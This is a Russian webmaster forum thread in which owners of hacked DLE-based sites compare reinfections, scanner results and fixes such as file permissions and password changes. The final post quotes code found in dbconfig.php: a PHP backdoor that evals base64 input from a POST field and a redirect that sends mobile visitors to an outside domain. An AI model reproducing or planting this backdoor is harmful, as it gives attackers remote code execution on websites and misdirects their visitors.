- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Ибо я сам точно не все вылечу!
У Вас после удаления снова появляется этот код в index? Восстановите бекап если есть, желательно дня за 3-5 до появление проблемы, обновить движек (по желанию), смените пароль на ФТП, поставте запрет на запись в index.php, если не поможет тогда уже надо рыться искать.
Я пока что сделал все так описал, с 9 утра пока траф идет как обычно.
Бэк нету(
пароли сменил
поставил запрет на запись в index.php
скрипт проверки айболит http://revisium.com/ai/
Спасибо! С помощью этого скрипта нашел изменения в след. файлах:
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
./index.php
Напихано много было. Пока что сайты нормально работают.
А заказать проверку дорого это стоит? Ибо я сам точно не все вылечу!
Я подавал заказ - 1900 рулей это стоит.
---------- Добавлено 25.02.2013 в 19:31 ----------
Спасибо! С помощью этого скрипта нашел изменения в след. файлах:
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
./index.php
Напихано много было. Пока что сайты нормально работают.
Если б еще соображать, что там напихано. Я тоже проверил - посмотрел на отчет, заплакал и закрыл...
---------- Добавлено 25.02.2013 в 19:32 ----------
По факту - сегодня вся эта байда повторилась. Опять в индекс.пхп всякие записи. Удали - заработало. А как поставить запрет на запись в php файлы?
Если б еще соображать, что там напихано.
Я просто сравнил с оригинальными файлами. В отчете тоже много всего было, но воспользовался лишь рекомендациями в первой части. Пока сайты работают, подгоняю свои шаблоны под 9.8. А чтобы запретить запись в файлы - поставь права доступа 444. Да, еще в админке сделал снимок антивирусом, чтобы в случае чего, было видно, какие файлы изменены.
Добрый день.
У меня аналагчная ситуация. Удалил утром код этот, вечером опять вернулся но уже немного короче.
Задолбали эти хакеры - третий раз код возвращается. Уже не знаю, что и делать...
И у меня снова редиректы сегодня.. Бекапа нет старого.
Еще и код сапы вирусняк сносит, похоже.
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
Вот эти файлы все проверьте. Тут идет перелинк с андроидов, телефонов и тд. Скачивается какая то параша. Что то серьезное творится. Надо лицензию брать.
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
Вот эти файлы все проверьте. Тут идет перелинк с андроидов, телефонов и тд. Скачивается какая то параша. Что то серьезное творится. Надо лицензию брать.
Нашел в ./engine/data/dbconfig.php
Что там лишнего?
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://live-internet.ws/');